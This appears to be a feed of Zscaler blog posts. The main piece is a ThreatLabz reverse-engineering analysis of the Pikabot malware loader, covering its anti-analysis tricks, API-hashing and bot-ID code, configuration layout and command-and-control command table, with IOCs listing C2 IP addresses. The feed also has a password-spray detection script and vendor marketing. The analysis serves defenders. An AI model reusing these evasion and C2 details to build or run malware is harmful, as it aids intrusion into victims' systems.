MITRE ATT&CK: No technique maps directly to this; the closest approximations are T1136.003 - Create Account: Cloud Account and T1098.003 - Account Manipulation: Additional Cloud Roles

Problem: Creation/modification of users with high privileges
Solution: Zscaler ITDR
How does it work? Monitors for and alerts on unauthorized addition of privileged permissions to principals.
MITRE ATT&CK: T1136.003 - Create Account: Cloud Account; T1098.003 - Account Manipulation: Additional Cloud Roles

Problem: Secret addition to apps
Solution: Zscaler SaaS Security
How does it work? Flags applications with multiple application secrets.
MITRE ATT&CK: T1098.001 - Account Manipulation: Additional Cloud Credentials

Problem: Disabled MFA
Solution: Zscaler ITDR
How does it work? Finds accounts where MFA is disabled and alerts when MFA is disabled for any account.
MITRE ATT&CK: T1556.006 - Modify Authentication Process: Multi-Factor Authentication

Problem: Consent grants
Solution: Zscaler SaaS Security
How does it work? Monitors the inclusion of high-risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All and alerts on the app's risk level.
MITRE ATT&CK: T1098.003 - Account Manipulation: Additional Cloud Roles; T1098.002 - Account Manipulation: Additional Email Delegate Permissions

What should I do next?
- Identity is the weakest link. Whether or not you are running a zero trust architecture, start by getting visibility into the identity misconfigurations and excessive permissions that allow attackers to grant themselves privileges. We are offering a complimentary Identity Posture Assessment with Zscaler ITDR.
- Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security.
- Implement Deception irrespective of what other threat detection measures you have. It is one of the highest-ROI threat detection controls you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers.

If you are a Zscaler customer, contact your account manager for support on these assessments and the Deception rollout.
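The low-and-slow spray described in this post (one or two attempts per account, many accounts, a rotating pool of residential IPs) never trips a per-account lockout, but it still has a shape, and a decoy account turns any attempt into a signal. As an added example that is not Zscaler's or Microsoft's code, the Python below runs both checks over a constructed set of Entra ID-style sign-in records: any sign-in attempt against a decoy user is an alert on its own (the T1110.003 row above), and an hour-long window in which many distinct accounts each fail at most twice from several source IPs is flagged as a spray even though no single account crossed a threshold. The record fields (ts, user, ip, result), the thresholds and the decoy name are assumptions for the example, and the events are constructed; real sign-in logs carry far more detail.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Set

# Tuning knobs: assumptions for this example, not vendor defaults.
WINDOW = timedelta(hours=1)
MIN_DISTINCT_USERS = 8        # a spray touches many accounts...
MAX_FAILS_PER_USER = 2        # ...but stays under a per-account lockout threshold
MIN_DISTINCT_IPS = 4          # a residential proxy pool shows up as many sources
DECOY_USERS = {"svc-backup-legacy@corp.example"}   # decoy identity: no legitimate sign-in is ever expected


@dataclass(frozen=True)
class SignIn:
    ts: datetime
    user: str
    ip: str
    result: str   # "failure" or "success"


def decoy_alerts(events: List[SignIn]) -> List[SignIn]:
    """Any attempt against a decoy user, failed or successful, is an alert on its own."""
    return [e for e in events if e.user in DECOY_USERS]


def detect_spray(events: List[SignIn]) -> List[Dict]:
    """Flag windows shaped like a low-and-slow password spray.

    Windows are anchored at each failure, so a burst straddling a clock boundary
    is not split. A user with many failures in the window (a real person mistyping
    a password) does not count toward the spray; only users with at most
    MAX_FAILS_PER_USER failures do, and the IPs are counted over those users only.
    """
    failures = sorted((e for e in events if e.result == "failure"), key=lambda e: e.ts)
    alerts: List[Dict] = []
    i = 0
    while i < len(failures):
        window_end = failures[i].ts + WINDOW
        per_user_fails: Dict[str, int] = defaultdict(int)
        per_user_ips: Dict[str, Set[str]] = defaultdict(set)
        j = i
        while j < len(failures) and failures[j].ts <= window_end:
            per_user_fails[failures[j].user] += 1
            per_user_ips[failures[j].user].add(failures[j].ip)
            j += 1
        sprayed = [u for u, n in per_user_fails.items() if n <= MAX_FAILS_PER_USER]
        spray_ips: Set[str] = set().union(*(per_user_ips[u] for u in sprayed)) if sprayed else set()
        if len(sprayed) >= MIN_DISTINCT_USERS and len(spray_ips) >= MIN_DISTINCT_IPS:
            alerts.append({"window_start": failures[i].ts, "users": len(sprayed), "ips": len(spray_ips)})
            i = j   # consume the whole window so one spray yields one alert
        else:
            i += 1
    return alerts


def analyze(events: List[SignIn]) -> Dict:
    """Combine both detections into one report."""
    return {"decoy_hits": len(decoy_alerts(events)), "spray_windows": detect_spray(events)}


# Constructed sign-in records: ten accounts each tried once from a pool of five
# "residential" IPs over forty minutes (the decoy is among them), one real user who
# mistypes a password three times before succeeding, and a stray failure hours later.
T0 = datetime(2023, 11, 28, 2, 0)
SPRAY_IPS = ["203.0.113.10", "203.0.113.22", "198.51.100.7", "198.51.100.91", "192.0.2.45"]
SAMPLE_EVENTS: List[SignIn] = [
    SignIn(T0 + timedelta(minutes=4 * k), f"user{k:02d}@corp.example", SPRAY_IPS[k % 5], "failure")
    for k in range(9)
] + [
    SignIn(T0 + timedelta(minutes=38), "svc-backup-legacy@corp.example", SPRAY_IPS[4], "failure"),
    SignIn(T0 + timedelta(minutes=10), "alice@corp.example", "10.0.0.5", "failure"),
    SignIn(T0 + timedelta(minutes=11), "alice@corp.example", "10.0.0.5", "failure"),
    SignIn(T0 + timedelta(minutes=12), "alice@corp.example", "10.0.0.5", "failure"),
    SignIn(T0 + timedelta(minutes=13), "alice@corp.example", "10.0.0.5", "success"),
    SignIn(T0 + timedelta(hours=6), "bob@corp.example", "10.0.0.9", "failure"),
]

if __name__ == "__main__":
    report = analyze(SAMPLE_EVENTS)
    print(f"decoy sign-in attempts: {report['decoy_hits']}")
    for w in report["spray_windows"]:
        print(f"spray window starting {w['window_start']}: {w['users']} accounts from {w['ips']} IPs")
```

On the constructed data the spray is reported once (ten accounts, five IPs) and the decoy hit is reported separately; alice's three failures from one IP are ignored by the spray logic, which is the point of counting accounts rather than attempts. The decoy check needs no thresholds at all, which is why the post treats it as the higher-confidence signal.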
Tue, 13 Feb 2024 17:10:20 -0800 Amir Moin

The (D)Evolution of Pikabot

Introduction
Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in the use of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot, likely because a BlackBasta ransomware affiliate replaced Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023; its version number at that time was 1.1.19. In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes to its code base and structure. Although it appears to be in a new development and testing cycle, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications.

Key Takeaways
- Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023.
- In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot emerging.
- In February 2024, a new version of Pikabot was released with significant changes.
- Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms.
- Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted configuration elements only when required.
- Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms.

Technical Analysis
As covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads received from the command-and-control server.
The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses distribution methods, campaigns, and behaviors similar to Qakbot's. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.

In the following sections, we describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.

Anti-analysis techniques
As with previous versions of Pikabot, this variant employs a series of anti-analysis techniques to make analysis more time-consuming. It should be noted that none of the methods below represents a significantly advanced capability. Furthermore, previous versions of Pikabot used a series of more advanced detection features in the loader component.

Strings encryption
The most notable change is the string obfuscation. In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective at hindering analysis, particularly automated configuration extraction: to analyze Pikabot, an analyst needed to locate not only each encrypted string but also its unique RC4 key, and additionally had to extract the AES key and initialization vector, which were unique to each Pikabot payload. The approach the Pikabot developers followed is similar to ADVobfuscator.

In the latest version of Pikabot, the majority of strings are constructed by pushing each character onto the stack one at a time (Figure 1); in a few rare cases, strings are still encrypted, using the RC4 algorithm only.

Figure 1. String stack construction

Junk instructions
This anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or placed in a separate function that is called from it (Figure 2).

Figure 2. Junk code

Anti-debug methods
Pikabot uses two methods to detect a debugging session:
- Reading the BeingDebugged flag from the PEB (Process Environment Block).
- Calling the Windows API function CheckRemoteDebuggerPresent.
Pikabot repeats these debugging checks in certain parts of its code, for example when it encodes or decodes network data or when it makes a request to receive a network command.

Anti-sandbox evasion
In addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:
- Pikabot uses native Windows API calls.
- Pikabot delays code execution at different stages of its code. The timer is randomly generated each time.
- Pikabot dynamically resolves all required Windows API functions via API hashing.

A Python representation of the hashing algorithm is below. The hash is case-insensitive: lowercase ASCII letters are folded to uppercase before being mixed in.

    api_name = b""  # export name to hash, e.g. b"LdrLoadDll"
    checksum = 0x113B
    for c in api_name:
        if c > 0x60:  # fold lowercase ASCII to uppercase
            c -= 0x20
        checksum = (c + (0x21 * checksum)) & 0xffffffff
    print(hex(checksum))

Language detection
Identical to previous versions, Pikabot stops execution if the operating system's language is either of the following:
- Russian (Russia)
- Ukrainian (Ukraine)
This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.

Bot initialization phase
Unlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below.
For brevity, we redacted non-essential members of the structure (such as Windows API names).

    struct bot_structure {
        void *host_info;
        HINTERNET winhttp_session_handle;
        bool bot_error_init_flag;
        FARPROC LdrLoadDll;
        FARPROC LdrGetProcedureAddress;
        FARPROC RtlAllocateHeap;
        FARPROC RtlReAllocateHeap;
        FARPROC RtlFreeHeap;
        FARPROC RtlDecompressBuffer;
        FARPROC RtlGetVersion;
        FARPROC RtlRandomEx;
        // --- redacted ---
        wchar_t* bot_id;
        bool registered_flag;
        int process_pid;
        int process_thread_id;
        int* unknown_unused_1;
        unsigned short os_arch;
        unsigned short dlls_apis_loaded_flag;
        int unknown_unused_2;
        unsigned char* host_rc4_key;
        int number_of_swap_rounds;
        int beacon_time_ms;
        int delay_time_ms;               // Used only during the initialization phase of Pikabot.
        int delay_seed_mul;
        wchar_t* bot_version;
        wchar_t* campaign_tag;
        wchar_t* unknown_registry_key_name;
        cncs_info* active_cnc_info;
        cncs_info* cncs_list;
        int num_of_cncs;
        int unknown_unused_3;
        int max_cnc_attempts;
        wchar_t* user_agent;
        void* uris_array;
        void* request_headers_array;
        TEB* thread_environment_block;
    };

    struct cncs_info {
        wchar_t* cnc;
        int cnc_port;
        int http_connection_settings;    // If set to 1, the server's certificate validation is ignored and the flags WINHTTP_FLAG_SECURE | WINHTTP_FLAG_BYPASS_PROXY_CACHE are set
        int connection_attempts;
        bool is_cnc_unavailable;
        cncs_info* next_cnc_ptr;
    };

Bot configuration
The latest version of Pikabot stores its entire configuration in plaintext at a single address. This is a significant regression: in previous versions, Pikabot decrypted each required element at runtime and only when required, and many of the configuration elements (e.g. command-and-control URIs) were randomized.

ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server side. If a bot sent incorrect information, it would be rejected or banned by the command-and-control server.

The configuration structure is the following (a pseudo-C description; the variable-length arrays are laid out inline and are not valid C):

    struct configuration {
        int number_of_swap_rounds_number_of_bytes_to_read_from_end;   // During bot initialization, this member is the number of bytes to read from the end of the configuration block.
        size_t len_remaining_structure;      // Size of the remaining structure's data minus the last element
        wchar_t* bot_minor_version;          // E.g. 32-beta. In some samples, this member contains both the major and minor versions of the bot.
        size_t len_campaign_name;
        wchar_t* campaign_name;
        size_t len_unknown_registry_key_name;
        wchar_t* unknown_registry_key_name;  // Used only in network command 0x246F.
        size_t len_user_agent;
        wchar_t* user_agent;
        size_t number_of_http_headers;
        wchar_string request_headers[number_of_http_headers];
        int number_of_cnc_uris;
        wchar_string cnc_uris[number_of_cnc_uris];
        int number_of_cncs;
        cnc cncs[number_of_cncs];
        int beacon_time_ms;
        int delay_time_ms;
        int delay_seed_mul;                  // Multiplied with the calculated delay value: delay_seed_mul * 1000.
        int maximum_cnc_connection_attempts;
        size_t len_bot_version;              // major version + minor version
        wchar_t* major_version;              // 1.8.
        int len_remaining_bytes_to_read;     // Added to the first member; gives how many more bytes to read right after `len_remaining_structure`
    };

    struct wchar_string {
        size_t length;
        wchar_t* wstring;
    };

    struct cnc {
        size_t len_cnc;
        wchar_t* cnc;
        int cnc_port;
        int connection_attempts;
        bool http_connection_settings;
    };

Once Pikabot has parsed the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping measure intended to defeat automated extraction of the configuration.

Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host.
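Those remaining Windows API functions are located through the hashing routine shown in the anti-sandbox section, which turns each export name into a 32-bit constant; the analyst's job is the reverse direction, mapping the constants found in a sample back to names. As an added example that is not part of the ThreatLabz write-up, the Python below wraps that routine in a function and builds a reverse lookup table over a constructed export list (the ntdll functions named in the bot structure above plus a few other exports); a real analysis run would enumerate every export of the DLLs the sample loads. The function and variable names are this example's own.

```python
from typing import Dict, Iterable, Optional

HASH_SEED = 0x113B
HASH_MULTIPLIER = 0x21


def pikabot_api_hash(api_name: bytes) -> int:
    """Reproduce the Pikabot 1.8.x API-hashing routine from the write-up:
    bytes above 0x60 (lowercase ASCII) have 0x20 subtracted, then
    h = c + 0x21 * h, truncated to 32 bits, starting from 0x113B."""
    checksum = HASH_SEED
    for c in api_name:
        if c > 0x60:
            c -= 0x20
        checksum = (c + HASH_MULTIPLIER * checksum) & 0xFFFFFFFF
    return checksum


def build_hash_table(export_names: Iterable[str]) -> Dict[int, str]:
    """Map hash -> export name. A collision is reported rather than silently
    overwritten, because it would make the reverse lookup ambiguous."""
    table: Dict[int, str] = {}
    for name in export_names:
        h = pikabot_api_hash(name.encode("ascii"))
        if h in table and table[h] != name:
            raise ValueError(f"hash collision: {table[h]!r} and {name!r} -> {h:#010x}")
        table[h] = name
    return table


def resolve_hash(table: Dict[int, str], h: int) -> Optional[str]:
    """Return the export name for a hash seen in a sample, or None if unknown."""
    return table.get(h & 0xFFFFFFFF)


# Constructed export list for the demo: the ntdll names kept in the bot structure
# plus a few kernel32/winhttp exports. Feed the full export tables in practice.
KNOWN_EXPORTS = [
    "LdrLoadDll", "LdrGetProcedureAddress", "RtlAllocateHeap", "RtlReAllocateHeap",
    "RtlFreeHeap", "RtlDecompressBuffer", "RtlGetVersion", "RtlRandomEx",
    "GetVolumeInformationW", "CheckRemoteDebuggerPresent", "WinHttpOpen",
]

HASH_TABLE = build_hash_table(KNOWN_EXPORTS)


def resolve_many(hashes: Iterable[int]) -> Dict[int, Optional[str]]:
    """Resolve a batch of hashes, e.g. the DWORD constants pulled out of a sample."""
    return {h: resolve_hash(HASH_TABLE, h) for h in hashes}


if __name__ == "__main__":
    sample_hashes = [pikabot_api_hash(b"LdrLoadDll"), 0xDEADBEEF]
    for h, name in resolve_many(sample_hashes).items():
        print(f"{h:#010x} -> {name or '<unknown>'}")
```

Because the fold to uppercase happens before mixing, "ldrloaddll" and "LdrLoadDll" hash identically, so a table built from the canonical export names resolves hashes regardless of the casing the malware author used.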
The algorithm is similar to previous versions and can be reproduced with the following Python code:

```python
def checksum(input: int) -> int:
    # Linear congruential step shared by all three parts of the bot ID.
    return (0x10E1 * input + 0x1538) & 0xffffffff


def generate_bot_id_set_1(host_info: bytes, volume_serial_number: int) -> int:
    # Fold the lower-cased "username|hostname" bytes into the volume serial number.
    for current_character in host_info.lower():
        volume_serial_number *= 5
        volume_serial_number += current_character
    bot_id_part_1 = checksum(volume_serial_number & 0xffffffff)
    return bot_id_part_1


def generate_bot_id_set_2(volume_serial_number: int) -> int:
    bot_id_part_2 = checksum(volume_serial_number)
    bot_id_part_2 = checksum(bot_id_part_2)
    return bot_id_part_2


def generate_bot_id_set_3(bot_id_part_2: int) -> int:
    # Eight further rounds; keep the low byte of each and read the last four as a little-endian integer.
    out = []
    for i in range(8):
        bot_id_part_2 = checksum(bot_id_part_2)
        out.append(bot_id_part_2 & 0xff)
    out = bytes(out[-4:])
    return int.from_bytes(out, byteorder='little')


host_info = b"username|hostname"
# Placeholder value: the original listing left the hexadecimal volume serial number blank.
# Replace it with the value GetVolumeInformationW returns on the host being reproduced.
volume_serial_number = int("12345678", 16)
bot_id_part_1 = generate_bot_id_set_1(host_info, volume_serial_number)
bot_id_part_2 = generate_bot_id_set_2(volume_serial_number)
bot_id_part_3 = generate_bot_id_set_3(bot_id_part_2)
bot_id = f"{bot_id_part_1:07X}{bot_id_part_2 & 0xffff:09X}{bot_id_part_3}"
```

ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.

Network communications

Pikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has changed considerably. Pikabot starts by registering the compromised host with its server.
First, Pikabot collects information from the compromised host, such as:

- Monitor's display settings
- Windows version
- Hostname/username and operating system's memory size
- Beacon and delay settings
- Process information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list)
- Bot's version and campaign name
- Name of the domain controller

Then Pikabot appends the following information to the registration packet:

- A 32-byte network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot used AES-CBC with a random key/IV per request.
- Unknown registry key name. We observed it used only in the network command with ID 0x246F.
- Number of swap rounds used for encoding the data. This remains the same for the rest of the session.

Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data with a POST request to the command-and-control server. The encoding involves swapping bytes N times, where N is a randomly generated number in the range 0-25.

ANALYST NOTE: Despite the fact that a round number is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format from its network packets and inserts everything in a raw format.

If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of the network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.

| Command ID | Description |
|---|---|
| 0x164 | Requests a command from the command-and-control server. The packet includes the command ID, size of the bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute. |
| 0x555 | Reports the output of the executed network command to the command-and-control server. |
| 0x1291 | Registers the bot. An unknown integer value (0x1687) is appended to the packet at offset 8. |
| 0x1FED | Updates beacon time. |
| 0x1A5A | Terminates/kills the bot. |
| 0x2672 | Not implemented. |
| 0x246F | Writes a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name). |
| 0xACB | Executes the system command and sends back the output. Includes the error code 0x1B3 if there is no output. |
| 0x36C | Injects the code of a downloaded PE file. The target process information is specified in the network packet. |
| 0x792 | Injects the code of downloaded shellcode. The target process information is specified in the network packet. |
| 0x359 | Executes a system command and sends back the output. Note: same as 0xACB but does not send the error code. |
| 0x3A6 | Executes a system command and sends back the output. Note: same as 0xACB but does not send the error code. |
| 0x240 | Executes a system command and sends back the output. Note: same as 0xACB but does not send the error code. |
| 0x985 | Collects processes' information: executable's filename; process ID; a boolean flag indicating whether it is a Pikabot process; a boolean flag indicating whether Pikabot can access the process with all possible access rights; number of threads; base priority of threads; process architecture; parent process ID. |
| 0x982 | Not implemented. |

Table 1. Pikabot Network Commands

Conclusion

Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is in constant development. However, the developers have decided to take a different approach and decrease the complexity level of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, it appears that certain features and network commands have not been implemented yet and are still a work in progress.
Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.

Indicators Of Compromise (IOCs)

| SHA256 | Description |
|---|---|
| 555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f | Pikabot sample (version 1.8.32-beta) |
| ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d | Pikabot sample (version 1.8.32-beta) |

| IOC | Description |
|---|---|
| 104.129.55[.]103:2224 | Command-and-Control server |
| 178.18.246[.]136:2078 | Command-and-Control server |
| 158.220.80[.]167:2967 | Command-and-Control server |
| 104.129.55[.]104:2223 | Command-and-Control server |
| 23.226.138[.]161:5242 | Command-and-Control server |
| 37.60.242[.]85:9785 | Command-and-Control server |
| 23.226.138[.]143:2083 | Command-and-Control server |
| 37.60.242[.]86:2967 | Command-and-Control server |
| 85.239.243[.]155:5000 | Command-and-Control server |
| 158.220.80[.]157:9785 | Command-and-Control server |
| 65.20.66[.]218:5938 | Command-and-Control server |
| 95.179.191[.]137:5938 | Command-and-Control server |
| 139.84.237[.]229:2967 | Command-and-Control server |

Zscaler Coverage

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:

- Win32.Trojan.PikaBot
- Win32.Downloader.PikaBot

Mon, 12 Feb 2024 10:11:52 -0800 Nikolaos Pantazopoulos

Start Your Journey in IT Support: A Beginner's Guide

Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner’s Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers who are eager to become influential service desk team members. It’s a practical guide even for those with limited time. Whether you're dealing with device issues, network complexities, or application troubleshooting, you’ll find step-by-step instructions that are easy to follow even with minimal IT knowledge.
We’ve designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team.

In this ebook, you'll find:

- An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity.
- Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues, enhancing customer satisfaction efficiently.
- Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them.
- A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions.
- Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving.

It’s also an excellent tool for service desk managers to expedite team onboarding. By equipping your team with this resource, you’ll enable them to handle a wide range of IT issues independently. It reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can help not only enhance your service desk team’s capabilities, but also significantly shorten the time it takes for new analysts to become proficient.

Download the ebook today and transform your service desk team!

Fri, 09 Feb 2024 19:14:07 -0800 Rohit Goyal

Cushman & Wakefield’s Roadmap for Consolidating and Simplifying Security with Zscaler

As a CISO leading the cybersecurity program at Cushman & Wakefield, one of the world's largest commercial real estate services firms, I can attest that it has been a truly transformative journey.
When I joined the company over five years ago, I had clear priorities: improve SaaS application performance for our distributed, mostly mobile workforce, now more than 52,000 employees, simplify network architecture, and accelerate integration of mergers and acquisitions (M&As). My vision was to evolve Cushman & Wakefield’s security approach from a legacy on-premises infrastructure to cloud-based security as a service.

As we set our sights on a cloud-first and partner-first model, we aimed to shrink the size and number of our data centers. Our intent was to streamline our infrastructure and build a coordinated security ecosystem with an eye toward gaining operational efficiencies. Equally important was providing our globally dispersed users with faster, more secure access to the more than 200 SaaS applications they rely on every day.

To achieve these goals, we turned to the Zscaler Zero Trust Exchange—and it has proven to be the perfect fit for our strategic vision. Zscaler has been at the core of our success and continues to be at the center of our ongoing security transformation journey.

A phased approach to our Zscaler implementation

In 2019, we made a strategic decision to adopt SD-WAN to improve SaaS connectivity across our more than 400 branch offices. That’s when we adopted Zscaler. We selected Zscaler Internet Access (ZIA), part of the Zero Trust Exchange, as our security solution because it interoperates seamlessly with the SD-WAN and enables secure local internet breakouts without the high costs and complexity of on-premises firewall appliances.

The joint solution provided consistent protection and significantly better performance for our users on any device anywhere. Additionally, our security team had complete visibility over what was happening on the network and who was using which applications. This allowed us to manage bandwidth and prioritize traffic to business-critical applications and limit the impact of streaming and social media traffic.
We’re continuing to modernize our branch offices but are moving to a café model, where users can securely connect to corporate resources without VPN or SD-WAN. Zscaler is making this change possible. Looking ahead, we also plan to implement Zscaler Private Access more broadly to provide secure access to private applications as we establish offices in new regions.

Following the user during the pandemic and beyond

At every stage of our implementation, we found that Zscaler delivered value in new ways. Even before the COVID-19 pandemic, a significant portion of our workforce was operating remotely. When the pandemic struck, we were well prepared. Zscaler Client Connector had already been deployed on all devices, so we maintained business continuity. When a leader asked me what my plan was for security at the time, I just shrugged my shoulders and informed him that we already had all our bases covered with Zscaler and CrowdStrike being the primary components.

Zscaler integrations for a coordinated security ecosystem

After the positive experience we had with the Zscaler integration, we are impressed with how easy and seamless it is to integrate other tools in our security stack with Zscaler. Recently, we integrated Zscaler with CrowdStrike for an added layer of protection: Zscaler only allows devices that meet CrowdStrike’s Zero Trust Assessment (ZTA) score threshold to access sensitive applications. By sharing real-time threat intelligence, data alerts, and device health information, the Zscaler-CrowdStrike integration has reduced the number of security events.

As we move forward with building out our zero trust architecture and creating a unified security ecosystem, we plan to leverage Zscaler’s open API more fully to maximize our other security investments. We’re looking at ways to broaden threat intelligence sharing, gain more visibility, and engage automation to a greater degree.
At the top of my to-do list are integrating with CrowdStrike Falcon LogScale, its next-generation SIEM and log management tool, and with Mimecast, the cloud-based email security and management system used by all our employees.

Future focus: expanding Zscaler capabilities

Risk management

I also look forward to evaluating the new AI-powered capabilities like Zscaler Risk360 to gain visibility into risk in all areas of our environment. Once it’s in place, Zscaler Risk360’s visualization framework will generate risk posture profiles using real data in our environment combined with global security research from Zscaler ThreatLabz. The ability to quickly identify and respond to critical vulnerabilities will enhance our proactive protection, enable us to communicate security priorities in a quantifiable way, and help us build a data-driven case as we advocate for additional resources.

M&A integration

Over the years, most of our growth has been fueled by M&As. We plan on leveraging Zscaler to integrate acquired companies and enable these new users to have access to business-critical applications in days rather than months.

Combating data loss and insider threats

We are also on a mission to curb data loss overall and to combat insider threats, whether due to negligence or malicious motives. These challenging tasks are made easier with the multi-pronged defense made possible by the zero trust architecture we have in place and continue to build on. By ensuring least privilege access and preventing lateral movement, we are limiting potential damage from abuse of insider access. The Zscaler Zero Trust Exchange plays a critical role in keeping these threats at bay by minimizing the attack surface—users connect only to a single application, not to the network.

As we continue on our zero trust journey, enhancing data protection in this age of generative AI engines like ChatGPT is a top priority.
Zscaler’s inline TLS/SSL traffic inspection will be essential for preventing the leakage of sensitive data by identifying and blocking attempted unauthorized uploads to AI tools and across all our cloud apps.

Gaining deeper visibility into user activity is another focus area. While most of our employees are trusted, honest professionals, mistakes happen. By implementing deception tools such as honeypots and lures, our security team will receive alerts to help them detect anomalous insider behavior faster. This significantly reduces dwell time for any potential incidents.

A partnership for the long haul

As CISO, my aim is to continue delivering seamless access and robust security for our global staff as we grow our business and expand our presence and offer new services. The flexible, scalable Zero Trust Exchange aligns with this goal. Our partnership with Zscaler has been integral to Cushman & Wakefield’s cloud-first journey. Together, we’ve shifted from legacy networks to a unified, user-centric security model that enables productivity and protection anywhere. I am confident that our journey toward a more secure and efficient future will continue successfully with Zscaler as our trusted partner. The results we have achieved thus far speak for themselves.

To learn more, read the case study.

Thu, 15 Feb 2024 08:37:55 -0800 Erik Hart

How Zscaler’s Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less

On any given day, our team of security professionals who comprise the OMES Oklahoma Cyber Command stay on top of up to 17 million potential threats ranging from phishing and credential compromise to ransomware and data breaches.
Dedicated to securing the digital assets of the State of Oklahoma government, these members are also stewards of massive amounts of sensitive personal and healthcare data—from our more than 30,000 employees and the nearly 4 million state residents served by our more than 180 agencies. Thanks to the Zscaler Zero Trust Exchange platform, we are successfully managing this high volume of threats and safeguarding the vital data we have been entrusted with.

One of the Zscaler superpowers we have come to rely on is its integration capabilities. By working in sync with other components of our security stack, Zscaler has taken us to the next level of our security maturity and zero trust transformation.

Keep pace by unifying security

We know that the spiraling volume of threats will always be a challenge, especially now that cybercriminals are beginning to leverage AI for malicious purposes. When new security challenges emerge, we need to be able to respond at lightning speed. Amid all the change and complexity in the security and technology landscape, I’m finding that the solution is to simplify and unify our security infrastructure. One of the ways we have done that is by taking full advantage of Zscaler’s powerful integration capabilities. When you work with a single unified platform, it almost forces efficiency, and it certainly aids in the ongoing battle most state governments face of having to do more with less.

Integrations provide a holistic view

One of the things that differentiates Zscaler from other solutions is its open application programming interface (API), which has made it easy to integrate with our existing security solutions. In our environment, we’ve found that Zscaler plays well with other core tools we rely on—namely CrowdStrike and Splunk—in how it shares threat intelligence data and coordinates protection and incident response.
The ability to tie these security tools together increases telemetry and gives us the opportunity to stop lateral threats before they become bigger problems that could potentially affect our users and our citizens.

Zscaler-CrowdStrike integration curbs lateral threat movement

By sharing telemetry and threat intelligence data between the CrowdStrike platform and the Zscaler Zero Trust Exchange, access policies can automatically be adapted according to changing user context, device health, and newly detected threats, making investigation and response faster and more effective. For example, let’s say we know there’s an attack occurring—maybe the next SolarWinds or a user just installed a new, unauthorized app that has weakened the endpoint posture. With the Zscaler-CrowdStrike integration, CrowdStrike can detect the change, recalculate the Falcon Zero Trust Assessment (ZTA) score and share it with Zscaler. Based on the updated ZTA score, Zscaler policy control can automatically adapt to a stricter threshold to only allow access via a browser isolation session or even block the connection to protect against access to selected mission-critical applications.

